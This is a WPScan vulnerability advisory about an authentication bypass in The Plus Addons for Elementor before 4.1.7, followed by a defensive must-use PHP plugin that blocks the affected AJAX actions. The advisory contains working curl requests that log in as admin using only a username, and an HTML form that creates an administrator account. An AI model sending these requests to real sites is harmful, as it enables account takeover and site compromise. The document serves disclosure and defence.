Ville Korhonen (Seravo), Antony Booker (WP Charged)
WPEX-ID: C311FEEF-7041-4C21-9525-132B9BD32F89
Mar 08, 2021

The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass


The plugin was being actively exploited by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as to create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled and the Login widget is not active.

The vendor was notified by the two reporters:
- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th.
- On March 7th and 8th, 2021 by WP Charged, who saw the attacks start on March 5th, 2021.

We (WPScanTeam) escalated the issues to Envato on March 8th, 2021 after confirming them and finding another similar authentication bypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.

The "theplus_ajax_login" and "theplus_google_ajax_register" AJAX actions, which are available to unauthenticated users, allow a trivial authentication bypass as any user by only providing the related username (passed in the "email" parameter, as the requests below show):

curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php

The "theplus_google_ajax_register" AJAX action can also be used by any unauthenticated user to create an account with an arbitrary role, such as administrator, via the "tp_user_reg_role" parameter; the new account is then logged in automatically. Any value is accepted for the "nonce" parameter (the request below uses "any"):

<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="newadmin@example.com" name="email" type="text"> <!-- placeholder address; the original value was obscured by the page mirror -->
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>

Finally, the "theplus_ajax_register" AJAX action can also allow an unauthenticated user to create accounts with an arbitrary role, such as admin; however, this requires registration to be enabled and the Login widget to be in use.
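The permanent fix is updating the plugin to 4.1.7 or later. As an added example that is not part of the original advisory or of the plugin's code, the following hypothetical must-use plugin denies the three AJAX actions named above to unauthenticated requests on a site that cannot be updated immediately. It assumes the plugin exposes these actions through "wp_ajax_nopriv_" hooks registered at the default priority (which is what makes them reachable without logging in); the file name, function names and log message are the example's own.

```php
<?php
/**
 * Plugin Name: Deny unauthenticated The Plus Addons AJAX actions (stopgap)
 * Description: Added example, not vendor code. Place in wp-content/mu-plugins/
 *              until The Plus Addons for Elementor is updated to 4.1.7 or later.
 */

// The three AJAX actions named in the advisory. Only the "nopriv" hooks are
// touched, so logged-in users keep using the plugin's own handlers.
function tp_stopgap_blocked_actions() {
    return array(
        'theplus_ajax_login',
        'theplus_google_ajax_register',
        'theplus_ajax_register',
    );
}

// Runs before the plugin's own handler (priority -100 versus the default 10),
// records the attempt without any of the submitted credentials, and ends the
// request with a 403 so the handler that performs the login/registration never runs.
function tp_stopgap_deny_nopriv() {
    // admin-ajax.php reads the action from $_REQUEST, so GET and POST are both covered.
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : 'unknown';
    $ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf( 'tp_stopgap: denied unauthenticated AJAX action %s from %s', $action, $ip ) );
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 ); // ends the request via wp_die()
}

foreach ( tp_stopgap_blocked_actions() as $tp_action ) {
    add_action( 'wp_ajax_nopriv_' . $tp_action, 'tp_stopgap_deny_nopriv', -100 );
}
```

To check that the stopgap is in place, re-run the two curl requests from the advisory against the site: both should now return HTTP 403 with the JSON error body and, in particular, no "wordpress_logged_in_" Set-Cookie header. Entries in the PHP error log show whether the actions are still being probed and from where.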